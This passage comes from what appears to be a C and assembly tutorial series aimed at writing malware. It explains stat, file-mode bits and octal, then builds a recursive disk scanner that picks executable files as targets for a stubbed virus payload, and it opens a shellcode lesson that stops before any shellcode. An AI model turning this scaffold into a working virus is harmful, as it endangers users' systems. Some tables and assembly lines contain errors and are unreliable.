301 | https://www.linux-mips.org/wiki/Toolchains
302 | 
303 | Just uncompress the toolchain anywhere and set your `PATH` to the directory containing all the binaries... That's it
304 | 
305 | 
306 | * NEXT: [Programming for Wannabes. Part II. Systemcalls](part-02.md)
307 | 


--------------------------------------------------------------------------------
/part-08.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wanabes VIII. File Details
  2 | We have learnt how to scan directories and list their content, now we need to figure out how to get the details of the directory contents so we can chose the files we are interested on. This is actually very simple and requires one single system call.
  3 | 
  4 | # The `stat` system call
  5 | 
  6 | The `stat` system call, allow us to get all the details of a specific fie. The prototype of this syscall is :
  7 | 
  8 | ```C
  9 | int stat(const char *pathname, struct stat *statbuf);
 10 | ```
 11 | 
 12 | And the `struct stat` (now we know what a struct is don't we?), contains the following information:
 13 | 
 14 | ```C
 15 | struct stat {
 16 |        dev_t     st_dev;         /* ID of device containing file */
 17 |        ino_t     st_ino;         /* Inode number */
 18 |        mode_t    st_mode;        /* File type and mode */
 19 |        nlink_t   st_nlink;       /* Number of hard links */
 20 |        uid_t     st_uid;         /* User ID of owner */
 21 |        gid_t     st_gid;         /* Group ID of owner */
 22 |        dev_t     st_rdev;        /* Device ID (if special file) */
 23 |        off_t     st_size;        /* Total size, in bytes */
 24 |        blksize_t st_blksize;     /* Block size for filesystem I/O */
 25 |        blkcnt_t  st_blocks;      /* Number of 512B blocks allocated */
 26 | 
 27 |        /* Since Linux 2.6, the kernel supports nanosecond
 28 |           precision for the following timestamp fields.
 29 |           For the details before Linux 2.6, see NOTES. */
 30 | 
 31 |         struct timespec st_atim;  /* Time of last access */
 32 |         struct timespec st_mtim;  /* Time of last modification */
 33 |         struct timespec st_ctim;  /* Time of last status change */
 34 | };
 35 | ```
 36 | 
 37 | The most interesting field for us is `st_mode`, but there is a lot of other useful information that we will be using in the future. The structure is describe in the `stat` man page for your future references.
 38 | 
 39 | # Understanding the `st_mode` field
 40 | 
 41 | The `st_mode` field encodes the type of file and also the permissions. The man page includes some sample code showing us how to access that information. So, the way to access the type of file is using the bit mask `S_IFMT`:
 42 | 
 43 | ```C
 44 | struct st sb;
 45 | stat (a_file_name, &sb);
 46 | int type = sb.st_mode & S_IFMT
 47 | ```
 48 | 
 49 | The `&` operator is a bitwise AND.... It basically matches two binary numbers and only the bits that are the same remains. Let's see what is in `S_IFMT`. I can tell you directly, but I believe it is going to be good for you to learn how to get this information by yourself, so you can find whatever you want  in the future.
 50 | 
 51 | We will start looking in the header files indicated by the man page. At the top of the man page you will see the `includes` you need to add to your program to use the system call. 
 52 | 
 53 | 
 54 |     NAME
 55 |            stat, fstat, lstat, fstatat - get file status
 56 |     
 57 |     SYNOPSIS
 58 |            #include <sys/types.h>
 59 |            #include <sys/stat.h>
 60 |            #include <unistd.h>
 61 | 
 62 | 
 63 | The `sys/types.h` sounds pretty generic so I will skip it (you can actually look into it, but you won't find anything). So let's look into `sys/stat.h` that sounds more like the specifics for `stat`.
 64 | 
 65 |     $ grep "IFMT" /usr/include/sys/stat.h
 66 |     # define S_IFMT         __S_IFMT
 67 |     #define __S_ISTYPE(mode, mask)  (((mode) & __S_IFMT) == (mask))
 68 | 
 69 | Well, looks like the actual value is defined somewhere else, but we can see also a macro to quickly check against the different types. We can use it like:
 70 | 
 71 | ```C
 72 | __S_ISTYPE(sb.st_mode,S_IFREG)
 73 | // is equivalent to
 74 | (((sb.st_mode) & __S_IFMT) == (S_IFREG)
 75 | ```
 76 | 
 77 | That second define is called a macro. They work the same than the normal defines (they are just substituted by its value in the code before compiling) but we can use parameters to write more complex expressions. When we use parameters, the `define` is said to define a macro instead of a constant.
 78 | 
 79 | So, in order to find out the actual value of `S_IFMT`, we need to look into the includes, included by the include :). 
 80 | 
 81 |     $ grep "#include" /usr/include/sys/stat.h
 82 |     #include <features.h>
 83 |     #include <bits/types.h>         /* For __mode_t and __dev_t.  */
 84 |     #include <bits/stat.h>
 85 | 
 86 | _NOTE:I'm using grep to show this information. It is, in general, very handy to do it this way, but I would recommend, at the beginning, to find these information manually, that is, opening the file in an editor and browse through it. The reason is that you will see how this system include files look like and get familiar with them. You will also find curious thing that will spark your curiosity._
 87 | 
 88 | Again, we can go through all of them systematically, but `bits/stat.h` looks like the best candidate.
 89 | 
 90 |     $ grep "IFMT" /usr/include/bits/stat.h
 91 |     #define __S_IFMT        0170000 /* These bits determine file type.  */
 92 | 
 93 | We found it!. Actually if we open the file, we will also find, all the other relevant constants. These are the ones:
 94 | 
 95 | ```C
 96 | #define __S_IFMT        0170000 /* These bits determine file type.  */
 97 | 
 98 | /* File types.  */
 99 | #define __S_IFDIR       0040000 /* Directory.  */
100 | #define __S_IFCHR       0020000 /* Character device.  */
101 | #define __S_IFBLK       0060000 /* Block device.  */
102 | #define __S_IFREG       0100000 /* Regular file.  */
103 | #define __S_IFIFO       0010000 /* FIFO.  */
104 | #define __S_IFLNK       0120000 /* Symbolic link.  */
105 | #define __S_IFSOCK      0140000 /* Socket.  */
106 | 
107 | /* Protection bits.  */
108 | 
109 | #define __S_ISUID       04000   /* Set user ID on execution.  */
110 | #define __S_ISGID       02000   /* Set group ID on execution.  */
111 | #define __S_ISVTX       01000   /* Save swapped text after use (sticky).  */
112 | #define __S_IREAD       0400    /* Read by owner.  */
113 | #define __S_IWRITE      0200    /* Write by owner.  */
114 | #define __S_IEXEC       0100    /* Execute by owner.  */
115 | ```
116 | 
117 | But. Wait a minute!. Those numbers look a bit weird isn't it?
118 | 
119 | # Base 8, octal numbers
120 | So far we have been using decimal numbers (using base 10) and also hexadecimal numbers (using base 16). OK, true, and binaries (using base 2). However there is another base that is useful when working with computers. This is base 8 and the numbers represented in this base are said to be in octal format.
121 | 
122 | In C, you can write octal numbers just adding a `0` at the beginning of the number, the same way that we add a `0x` to represent an hexadecimal value. Octal representation is useful when we need to manipulate blocks of 3 bits (0 to 7.... that's eight values, hence octal). So, let's try to understand the values of the constants used by `stat`.
123 | 
124 | To understand how this matches to the hexadecimal representation, let's just count using both bases:
125 | 
126 |     HEX   OCT  BIN
127 |     0     0    0000 0000
128 |     1     1    0000 0001  <--
129 |     2     2    0000 0010  <--
130 |     3     3    0000 0011 
131 |     4     4    0000 0100  <--
132 |     5     5    0000 0101
133 |     6     6    0000 0110
134 |     7     7    0000 0111
135 |     8    10    0000 1000
136 |     9    11    0000 1001  <--
137 |     A    12    0000 1010  <--
138 |     B    13    0000 1011
139 |     C    14    0000 1100 <--
140 |     D    15    0000 1101
141 |     F    16    0000 1110
142 |     10   17    0000 1111
143 |     11   21    0001 0000
144 | 
145 | As you can see, when using the octal representation, the first digit of our number is actually the value of the lower 3 bits of the number. Each position in the number, represents the next 3 bytes, so the octal representation is very useful when we need to work with blocks of 3 bits, instead of 4 (we use hexadecimal in those cases).
146 | 
147 | For instance, check this out. Hopefully it will look familiar to you:
148 | 
149 |     chmod 777 afile
150 |           000 111 111 111 -> 0777
151 |           0001 1111 1111  -> 0x1ff
152 | 
153 | Both number `0x1ff` and `0777` are the same number (511 in decimal), but the octal representation allows us to write the digits as groups of three bits. In this case, each bit represent the execution, read and write permissions for the file. Imagine to use `chmod` with the decimal or hexadecimal numbers... It would be very tricky to change permissions of a file like that.
154 | 
155 | Anyhow and summing up, octal representation is used here and there whenever it is convenient to access the bits in a number in groups of three and not four. And one of these cases is the file permissions.
156 | 
157 | # Back to the `st_mode` constants
158 | Now, we can look again to the `st_mode` constants:
159 | 
160 | ```C
161 | #define __S_IFMT        0170000 /* These bits determine file type.  */
162 | 
163 | /* File types.  */
164 | #define __S_IFDIR       0040000 /* Directory.  */
165 | #define __S_IFCHR       0020000 /* Character device.  */
166 | #define __S_IFBLK       0060000 /* Block device.  */
167 | #define __S_IFREG       0100000 /* Regular file.  */
168 | #define __S_IFIFO       0010000 /* FIFO.  */
169 | #define __S_IFLNK       0120000 /* Symbolic link.  */
170 | #define __S_IFSOCK      0140000 /* Socket.  */
171 | 
172 | /* Protection bits.  */
173 | 
174 | #define __S_ISUID       04000   /* Set user ID on execution.  */
175 | #define __S_ISGID       02000   /* Set group ID on execution.  */
176 | #define __S_ISVTX       01000   /* Save swapped text after use (sticky).  */
177 | #define __S_IREAD       0400    /* Read by owner.  */
178 | #define __S_IWRITE      0200    /* Write by owner.  */
179 | #define __S_IEXEC       0100    /* Execute by owner.  */
180 | ```
181 | 
182 | Let's first figure out the structure of this field. Representing the different octal values as bit masks. You can check the table in the previous section to verify the values, but we just use blocks of 3 bits....
183 | 
184 |     001 111 000 000 000 000  -> __S_IFMT   (0170000)
185 | 	000 100 000 000 000 000  -> __S_IFDIR  (0040000)
186 | 	000 010 000 000 000 000  -> __S_IFCHR  (0020000)
187 | 	000 110 000 000 000 000  -> __S_IFBLK  (0060000)
188 | 	001 000 000 000 000 000  -> __S_IFREG  (0100000)
189 | 	000 001 000 000 000 000  -> __S_IFIFO  (0010000)
190 | 	001 010 000 000 000 000  -> __S_IFLNK  (0120000)
191 | 	001 100 000 000 000 000  -> __S_IFSOCK (0140000)
192 |       ^ ^^^	
193 |     000 000 100 000 000 000  -> __S_ISUID  (0004000)
194 | 	000 000 010 000 000 000  -> __S_ISGID  (0002000)
195 | 	000 000 001 000 000 000  -> __S_ISVTX  (0001000)
196 |             ^^^	
197 | 	000 000 000 100 000 000  -> __S_IREAD  (0000400)
198 | 	000 000 000 010 000 000  -> __S_IWRITE (0000200)
199 | 	000 000 000 001 000 000  -> __S_IEXEC  (0000100)
200 | 	            ^^^
201 | 
202 | As we can see the `__S_IFMT` is a mask to extract the high bits from the field that identify the type of file. Also note how the constant for the types of files have been defined as high numbers so we can compare directly just after ANDing the mask.
203 | 
204 | After the type of file, we find the special file attributes that indicates if the file is _SetUID_ or _SetGUID_ and also if the sticky bit is activate. And after that follows the file permissions for the owner, the group and the rest of users.
205 | 
206 | Yes, you are right, `bits/stat.h` only defines the mask for the owner. Actually, the constant defined above shouldn't be used by normal programs, we should use the ones redefined in `sys/stat.h`. I will include them here for you to check them out:
207 | 
208 | ```C
209 | /* Protection bits.  */
210 | 
211 | #define S_ISUID __S_ISUID       /* Set user ID on execution.  */
212 | #define S_ISGID __S_ISGID       /* Set group ID on execution.  */
213 | 
214 | #define S_IRUSR __S_IREAD       /* Read by owner.  */
215 | #define S_IWUSR __S_IWRITE      /* Write by owner.  */
216 | #define S_IXUSR __S_IEXEC       /* Execute by owner.  */
217 | /* Read, write, and execute by owner.  */
218 | #define S_IRWXU (__S_IREAD|__S_IWRITE|__S_IEXEC)
219 | 
220 | #define S_IRGRP (S_IRUSR >> 3)  /* Read by group.  */
221 | #define S_IWGRP (S_IWUSR >> 3)  /* Write by group.  */
222 | #define S_IXGRP (S_IXUSR >> 3)  /* Execute by group.  */
223 | /* Read, write, and execute by group.  */
224 | #define S_IRWXG (S_IRWXU >> 3)
225 | 
226 | #define S_IROTH (S_IRGRP >> 3)  /* Read by others.  */
227 | #define S_IWOTH (S_IWGRP >> 3)  /* Write by others.  */
228 | #define S_IXOTH (S_IXGRP >> 3)  /* Execute by others.  */
229 | /* Read, write, and execute by others.  */
230 | #define S_IRWXO (S_IRWXG >> 3)
231 | ```
232 | 
233 | I had removed a couple of lines to make easier reading the file. Here you can see how all constants are redefined, and the group and other permissions are just redefined as shifted versions of the original user masks we have just seen.
234 | 
235 | > NOTE: The `>>` operator shifts all the bits of the left hand operand to the right as many positions as the right hand operand indicates. `S_IRUSR >> 3` will shift `S_IRUSR` value 3 positions to the right. In this case: `S_IRUSR = __S_IREAD = 0000400` shifting this three positions to the right will produce `040` (remember octal digits works on groups of 3 bits).
236 | 
237 | Well, this has been a kindof a digression, but this concepts are usually confusing for the beginners and I though it would be great to add some explanation in the course,
238 | 
239 | # Back to our `select_target`
240 | 
241 | So, know we can modify our `select_target` to find the kind of files we are interested on. This is how the new function will look like:
242 | 
243 | ```C
244 | int select_target (PAYLOAD_FUNC pf) {
245 |   char                buf[BUF_SIZE];
246 |   struct linux_dirent *de;
247 |   struct stat         st;
248 |   int                 fd, n, i;
249 |   
250 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
251 | 
252 |   while (1) {
253 |     n = getdents (fd, buf, BUF_SIZE);
254 |     if (n < 0) MFW_EXIT ("getdents:");
255 |     if (n == 0) break;
256 | 
257 |     for (i = 0; i < n;) {
258 |       de = (struct linux_dirent *)(buf + i);
259 | 	  
260 |       if ((fstatat (fs, de->d_name, &st)) < 0) {
261 | 		  perror ("stat:");
262 | 		  continue; // Just ignore the error
263 |       }
264 |       if (((st.st_mode & S_IFMT) == S_IFREG)
265 | 		  && (st.st_mode & 00111))
266 | 		  pf (target);
267 |       
268 |       i += de->d_reclen;
269 | 
270 |     }
271 |   }
272 |  done:
273 |   close (fd);
274 |   return 0;
275 | }
276 | ```
277 | 
278 | Two comments on this code:
279 | 
280 | 1. We have used `fstatat` instead of `fstat` or `stat`, so we do not have to build the full path to the file before calling `stat`. This syscall uses the directory file descriptor as base and tried to look for the file **AT** the directory that we pass as first parameter. In this case it is very convenient and we avoid allocating memory for strings and concatenating them.
281 | 2. This is the `select_target` for a virus. We are checking that the directory entry is a regular file (`S_IFREG`) and then we check that it is executable. In this case we are just checking for all possible executable permissions but that may be different in a real case.
282 | 
283 | The permission checking could also be written like:
284 | 
285 | ```C
286 | st.st_mode & 00111; // Is the same than
287 | st.st_mode & (S_IXUSR|S_IXGRP|S_IXOTH)
288 | ```
289 | 
290 | Second one is better as you can easily see what we are comparing to... and the generated code would be the same... But first one is shorter and I chose that.
291 | 
292 | Now, you can try to change the program to look for other kind of files as it my happen in the case of ransomware or spyware. But you need a last piece of knowledge in order to be able to complete the implementation of `select_target`.
293 | 
294 | # Recursive functions
295 | The problem with our current `select_target` is that, it can only scan a single directory. In general, we should be able to scan the whole disk, that means that, we need to modify the function so, each time we find a directory, we also scan it. Or in other words, each time we find a directory we need to call ourselves again with the new directory name to scan.
296 | 
297 | A function that call itself is known as a recursive function. Recursive functions are very powerful and usually allows us to write very small and elegant code to deal with complex problems. A classical example is traversing a tree. It is way easier to do it with a recursive function that with normal iterative code.
298 | 
299 | In general, recursive function trades code complexity with memory usage. That is normal, we always trade either speed, memory or complexity. That's life. A recursive function will make extensive use of the stack creating stack frames again and again each time it calls itself. But other than that they are neat solutions to many problems, and usually requires way less code that an iterative solution.
300 | 
301 | _NOTE:The old BASIC programming language in the first microcomputer in the 80 didn't have a stack. They have the concept of subroutine but lacking a stack, you couldn't call a function recursively. That together with the design of the language was the cause of a lot of [spaguetti code](https://en.wikipedia.org/wiki/Spaghetti_code) in the programs at that time._
302 | 
303 | # A recursive `select_target`
304 | So, it's time to modify our program to be able to scan the whole disk. For that we will need to modify the function signature, so we get the current folder being scanned in the stack frame of our function and we can continue our work at the right place after processing every subfolder.
305 | 
306 | We will also add some messages and some indention to the function, for easily check that your function is working fine:
307 | 
308 | 
309 | ```C
310 | 
311 | int level = 0;
312 | char tabs[1024];
313 | 
314 | int payload (char *target) {
315 |   printf ("%s Doing malware things to %s\n", tabs, target);
316 | }
317 | 
318 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) {
319 |   char                buf[BUF_SIZE];
320 |   int                 flag = 1;
321 |   struct linux_dirent *de;
322 |   struct stat         st;
323 |   int                 fd, n, i;
324 |   
325 |   // Scan directory
326 | 
327 |   // Open directory using open
328 |   printf ("%s Processing : %s\n", tabs, folder); 
329 |   if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
330 |   // Update indentation string
331 |   tabs[level] = ' ';
332 |   level ++;
333 |   
334 |   while (flag) {
335 |     n = getdents (fd, buf, BUF_SIZE);
336 |     if (n < 0) MFW_EXIT ("getdents:");
337 |     if (n == 0) break;
338 | 
339 |     // Build file name
340 |     for (i = 0; i < n;) {
341 |       de = (struct linux_dirent *)(buf + i);
342 |       if ((fstatat (fd, de->d_name, &st, 0)) < 0) {
343 | 	    perror ("stat:");
344 | 	    continue; // Just ignore the error<- This is a bug can you fix it?
345 |       }
346 |       if (((st.st_mode & S_IFMT) == S_IFREG)
347 | 	        && (st.st_mode & 00111))
348 | 	           pf (de->d_name);
349 |       else if (((st.st_mode & S_IFMT) == S_IFDIR)
350 | 	             && !(de->d_name[0] == '.'
351 | 		              && (de->d_name[1] == 0
352 | 		                  || (de->d_name[1] == '.' && de->d_name[2]==0))))
353 | 	                          select_target (fd, de->d_name, pf);
354 | 	 
355 |       i += de->d_reclen;
356 |     }
357 |   }
358 |   // Remove indentation
359 |   tabs[level] = 0;
360 |   level--;
361 |   close (fd);
362 |   return 0;
363 | }
364 | ```
365 | 
366 | Despite the indentation thingy (we just add a space to a string every time we enter the function and remove it every time we left), there are two main changes:
367 | 
368 | ```C
369 |   if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
370 | ```
371 | 
372 | We have changed `open` for `openat`. This works the same than `statat`, we just pass as first parameter a file descriptor and, if the second parameter (the `pathname`) is relative it will open the file from the indicated directory, otherwise, if the path is absolute, will behave like a normal open.
373 | 
374 | This is convenient so we do not need to build the full file name ourselves. That is not a big deal (`strcpy`+ `strcat`), but this way we do not have to.
375 | 
376 | The second change is the recursive call. Basically, we just need to check if the directory entry is a directory. If that is the case we call ourselves again with the sub-directory name. However, remember the `.` and `..` entries we mentioned in last instalment?.... Sure, you do... well, we need to skip those, otherwise we get into an infinite loop.... This is the rest of the check.
377 | 
378 | ```C
379 | if (((st.st_mode & S_IFMT) == S_IFDIR)
380 | 	             && !(de->d_name[0] == '.'
381 | 		              && (de->d_name[1] == 0
382 | 		                  || (de->d_name[1] == '.' && de->d_name[2]==0))))
383 | 	                          select_target (fd, de->d_name, pf);
384 | ```
385 | 
386 | So, our `select_target` for malwares that need to look for files is ready. 
387 | 
388 | # Removing libC
389 | 
390 | So, we have been learning a lot about C programming, and we haven't talked much about asm. We will be looking to assembler in the coming instalments, but before starting with that we are going to remove the libc dependencies from our current test program, so we can have full control on the assembler version we are going to generate.
391 | 
392 | So far, we are using the following system calls:
393 | 
394 |     exit
395 |     write
396 |     openat
397 |     close
398 |     getdents
399 |     fstatat
400 | 
401 | So, our first task will be to generate a mini libc version for our program. This is easier than expected:
402 | 
403 | ```asm
404 | 	.global mfw_exit
405 | 	.global mfw_write
406 | 	.global mfw_close
407 | 	.global mfw_openat
408 | 	.global mfw_newfstatat
409 | 	.global mfw_getdents
410 | 	
411 | mfw_write:
412 | 	mov $0x01, %eax
413 | 	syscall
414 | 	ret
415 | 	
416 | mfw_openat:
417 | 	mov $0x101, %eax
418 | 	syscall
419 | 	ret
420 | 	
421 | mfw_close:
422 | 	mov $0x03, %eax
423 | 	syscall
424 | 	ret
425 | 
426 | mfw_exit:
427 | 	mov $0x3c, %eax
428 | 	syscall
429 | 	ret
430 | 
431 | mfw_newfstatat:
432 | 	mov %rcx, %r10
433 | 	mov %0x106, %eax
434 | 	syscall
435 | 	ret
436 | 
437 | mfw_getdents:
438 | 	mov $78, %eax
439 | 	syscall
440 | 	ret
441 | 
442 | mfw_open:
443 | 	mov $0x02, %eax
444 | 	syscall
445 | 	ret
446 | 
447 | mfw_lstat:
448 | 	mov $0x06, %eax
449 | 	syscall
450 | 	ret
451 | 
452 | ```
453 | 
454 | Have you notices something strange?. The implementation of all syscalls is pretty straightforward, except for the `fstatat`. This syscall has a peculiarity. The C ABI and the kernel ABI are different for the forth parameter. C function get that parameter on `RCX` as we already know, but the kernel syscalls expect them on `R10`. I forgot about that and expend quite sometime figuring out why the syscall was failing.
455 | 
456 | # The final version
457 | So, this is how the final version will look like:
458 | 
459 | ```C
460 | #include <fcntl.h>
461 | #include <sys/types.h>  
462 | #include <sys/stat.h>   // Stat struct
463 | 
464 | #define BUF_SIZE 1024
465 | 
466 | // XXX: Move this to a .h file
467 | // Dirent Data struct
468 | struct linux_dirent {
469 |   long           d_ino;
470 |   long           d_off;
471 |   unsigned short d_reclen;
472 |   char           d_name[];
473 | };
474 | 
475 | int     mfw_getdents (int fd, char *buf, int len);
476 | int     mfw_exit (int r);
477 | int     mfw_openat(int dirfd, const char *pathname, int flags);
478 | int     mfw_newfstatat (int dirfd, char *p, struct stat *st, int flags);
479 | int     mfw_close (int fd);
480 | size_t  mfw_write(int fd, const void *buf, size_t count);
481 | 
482 | #define MFW_EXIT(s) do {mfw_exit (1);} while (0)
483 | 
484 | typedef int (*PAYLOAD_FUNC)(char *);
485 | 
486 | // Global vars
487 | int level = 0;
488 | char tabs[1024];
489 | 
490 | int mfw_puts (char *s) {
491 |   while (*s) mfw_write (1, s++, 1);
492 | }
493 | 
494 | // Helper function to write tabbed strings 
495 | int mfw_print_tstr (char *s, char *v) {
496 |   mfw_puts (tabs);
497 |   mfw_puts (s);
498 |   if (v) mfw_puts (v);
499 |   mfw_puts ("\n");
500 | }
501 | 
502 | int payload (char *target) {
503 |   mfw_print_tstr ("   ++ Doing malware things to ", target);
504 | }
505 | 
506 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) {
507 |   char                buf[BUF_SIZE];
508 |   struct linux_dirent *de;
509 |   struct stat         st;
510 |   int                 fd, n, i;
511 | 
512 |   tabs[level] = ' ';
513 |   level ++;
514 | 
515 |   mfw_print_tstr (">> Entering ", folder);
516 | 
517 |   if ((fd = mfw_openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) goto clean;
518 |   
519 |   while (1) {
520 |     n = mfw_getdents (fd, buf, BUF_SIZE);
521 |     if (n < 0) continue; // Silently ignore errors
522 |     if (n == 0) break;
523 | 
524 |     for (i = 0; i < n;) {
525 |       de = (struct linux_dirent *)(buf + i);
526 |       if ((mfw_newfstatat (fd, de->d_name, &st, 0)) < 0) goto next;
527 |       
528 |       if (((st.st_mode & S_IFMT) == S_IFREG) && (st.st_mode & 00111))
529 | 	    pf (de->d_name);
530 |       else if (((st.st_mode & S_IFMT) == S_IFDIR)
531 | 	       && !(de->d_name[0] == '.'
532 | 		     && (de->d_name[1] == 0
533 | 		         || (de->d_name[1] == '.' && de->d_name[2]==0))))
534 | 	    select_target (fd, de->d_name, pf);
535 |     next:
536 |       i += de->d_reclen;
537 |     }
538 |   }
539 |  clean:
540 |   mfw_print_tstr ("<< Leaving ", folder);
541 |   tabs[level] = 0;
542 |   level--;
543 |   mfw_close (fd);
544 |   return 0;
545 | }
546 | 
547 | int main (int argc, char *argv[]) {
548 |   for (int i = 0; i < 1024; tabs[i++] = 0);
549 |   while (select_target(0, argv[1], payload));
550 | }
551 | 
552 | ```
553 | 
554 | As I did last time. This version has a few updates that I haven't described in the text. Try to understand what they are for and do not hesitate to ask your questions in case you cannot figure it out by yourself.
555 | 
556 | I named the asm code in previous section `minilibc.S`. So, in order to compile my program I have to do:
557 | 
558 |     gcc -o select_files select_file.c minilibc.S
559 | 
560 | # Conclusion
561 | We have now working code to scan a disk and test some basic file information as the type of file and the permissions. We have also learned how to navigate the system include files to find out the information we need and also how to master the octal numeric representation.
562 | 
563 | We have removed the libC dependencies and we are ready for a asm implementation. We will find out if that asm implementation worth the extra effort, and after that we will be ready to get started with some simple payload....
564 | 


--------------------------------------------------------------------------------
/part-03.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabees. Part III. Your first Shell Code
  2 | 
  3 | Let's go on with our special ASM/C programming course. At this point, we roughly know how a computer works, its main components, what is machine code, what is assembly code and how to compile simple programs for a few architectures.
  4 | 
  5 | In this part we are going to write our first shellcode. Yes, we are that advanced. But, before we get there, we will be exploring a few more new concepts. Let's start.
  6 | 
  7 | # Processor Native Word Size
  8 | In this part we will start dealing with stuff bigger than 1 byte, and to understand what is going on, we need to introduce the _Processor Native Word Size_. In a sense, you already know what it means. Whenever you talk about 32bits and 64bits processors/programs... well, that is the processor native word size.
  9 | 
 10 | However, beyond being the type of Linux distribution you choose to install, this value has some low level implications:
 11 | 
 12 | * This value is the native size of the processor registers. Do you remember the registers within the processor?. Sure you do. So, a 32 bits processor have 32bits registers and a 64bits processor have 64bits registers. This is not completely accurate but, for now, just consider this size as the one the processor is comfortable with.
 13 | * This value is usually also the width of the data bus.
 14 | * And, it is usually also the width of the address bus... 
 15 | 
 16 | Overall, and without going into the electronics within the processor, what you need to know is that each processor is optimised to work with its native word size. This way, a 32bits processor will perform arithmetic operations or access memory faster when it deals with a 32bits long value that when it deals with a 16bits long value. I know, this is a bit contra-intuitive and a bit of an act of faith but it will be very long and tedious to go through the details to understand this. Actually I'm not sure I could successfully guide you through that path.
 17 | 
 18 | To further illustrate this, below is a fragment of the "Intel's  80396 Programmers's Reference Manual" from 1986 (http://microsym.com/editor/assets/386intel.pdf). You can find it in section 2.2 "Data Types" page 24.
 19 | 
 20 | 
 21 | > Note that words need not be aligned at even-numbered addresses and
 22 | > doublewords need not be aligned at addresses evenly divisible by four. This
 23 | > allows maximum flexibility in data structures (e.g., records containing
 24 | > mixed byte, word, and doubleword items) and efficiency in memory
 25 | > utilization. When used in a configuration with a 32-bit bus, actual
 26 | > transfers of data between processor and memory take place in units of
 27 | > doublewords beginning at addresses evenly divisible by four; however, the
 28 | > processor converts requests for misaligned words or doublewords into the
 29 | > appropriate sequences of requests acceptable to the memory interface. Such
 30 | > misaligned data transfers reduce performance by requiring extra memory
 31 | > cycles. For maximum performance, data structures (including stacks) should
 32 | > be designed in such a way that, whenever possible, word operands are aligned
 33 | > at even addresses and doubleword operands are aligned at addresses evenly
 34 | > divisible by four. Due to instruction prefetching and queuing within the
 35 | > CPU, there is no requirement for instructions to be aligned on word or
 36 | > doubleword boundaries. (However, a slight increase in speed results if the
 37 | > target addresses of control transfers are evenly divisible by four.)
 38 | 
 39 | 
 40 | 
 41 | Summing up, try to program your processor using its native word size. It may look that you are wasting some space, but that is the right way to do it. 
 42 | 
 43 | I will just give a small hint on this topic before going on.
 44 | 
 45 | 
 46 | # An Example: Processor Word Size and Memory.
 47 | We have just said in the previous section that a 32bits processor will operate faster on a 32bit value and will also access faster a 32bits value in memory than a 16 bits one.
 48 | 
 49 | The first thing you can infer from that sentence is that, even if the smaller addressable value in memory is 8 bits (do you remember the size of our memory drawers from Part I?), a 32bits processor can read 32bits from memory at once.
 50 | 
 51 | This simple sentence has quite some concepts behind it. Let's go one by one
 52 | 
 53 | ## Simplified Memory Hardware Model
 54 | The memory system in a PC can be quite elaborated and it is beyond the scope of this course to go into those details, however, discussing a simplified model of the system memory will be beneficial for us.
 55 | 
 56 | In its simplest way, a memory chip provides the following pins... 
 57 | 
 58 | - `AX` pins usually known as Address pins (with X=0...WordSize)
 59 | - `DX` pins usually known as Data pins    (with X=0...WordSize)
 60 | - `Cx` pins usually know as Control pins. (depends on the processor)
 61 | 
 62 | The CPU also have similar `AX` and `DX` pins that are connected to the memory. This connection is not direct (we really need a bus between them), but for this simplified model we can consider that they are directly connected.
 63 | 
 64 | The control pins allows the _Processor_ to command the memory. In this group you will usually find: 
 65 | 
 66 | - `OE/CS` (Output Enable, Chip Select). These pins will, in a sense, _ACTIVATE_ the memory chip (either the input or the output). 
 67 | - `WR/RD` (Wrtite, Read). These ones are used to tell the memory if we want write into the memory or to read values from it.
 68 | 
 69 | So, whenever the CPU wants to read a value from the memory, it puts the value of the address to access in its address pins (`AX`) which are connected to the memory `AX` pines, usually by a bus. Then, the right control signal are exercised in the memory chip, and it will put in its `DX` pins the value in the memory address indicated by `AX`.
 70 | 
 71 | OK, let's put some numbers to better understand this:
 72 | 
 73 |     ----+                          +-----------
 74 |         +- A0 ---------------  A0 -+
 75 |         +- ... -------------- ... -+
 76 |     CPU +- A31--------------- A31 -+  Memory 
 77 |         +- ...                     |
 78 |         +- D0 ---------------- D0 -+
 79 |         +- ... -------------- ... -+
 80 |         +- D31 -------------- D31 -+
 81 |     ----+                          +------------
 82 | 
 83 | Imagine that the `RIP` register (do you remember the Instruction Pointer?), is pointing to address 4, so, the instruction on address 4 is the next one to execute. The CPU has to read from memory that instruction, so it puts in the address bus the value
 84 | 
 85 |     1098765432109876543210
 86 |     33222222222211111111119876543210
 87 |     --------------------------------
 88 |     00000000000000000000000000000100
 89 | 
 90 | Only pin `A2`  will be set. That actually means address 4. So, these pins are also connected to the memory. Whenever the `RD` control signal is activated in the memory, the chip will access address 4 and put in `D0` to `D31` the value stored at that position.... Remember this is a simplified model... a lot more things goes on when accessing memory.
 91 | 
 92 | Then, the memory will put the value of address 4 in `D0-D7`. As each memory position is 8 bits, we only need 8 physical pins to send the value to the CPU. What happens is that is a huge waste. In general, the memory, will not put only 1 byte in the `Dx` lines, it will put as much as it can... in this example it means that it will output 4 bytes, starting from address 4, using the 32 `Dx` signals in the bus.
 93 | 
 94 | _Again, this is a simple example. Some times, your memory only has a data bus 8 bits long and multiple memory chips are used to access 16, 32 or 64 bits words... in those cases, there is a real physical constraint with regards to memory aligned accesses. This little things are the ones that makes a difference between two systems._
 95 | 
 96 | 
 97 | ## CPU Native Word Size
 98 | As you can imagine by now, there is a relation between the processor and the rest of the computer with regards to this native word size. A 32bits processor will interface to a _32bits memory system_ (is not that straightforward, but roughly that is what happens and, when it says _system_ it may actually be saying several chips). 
 99 | 
100 | Now, imagine that you want to just read a byte. You put your address in the `Ax` lines and ask the memory chip to spit the content of that address. The memory chip will put in the `Dx` the content of that address you request plus the 3 next addresses. The CPU will then read those 4 bytes from the bus and... just get the lower 8 bits from that value. In a sense, that requires something extra to do than just reading the whole 32bits value into our 32bits register. You see what I mean? (in this case it is just discarding 3 out of the 4 bytes)
101 | 
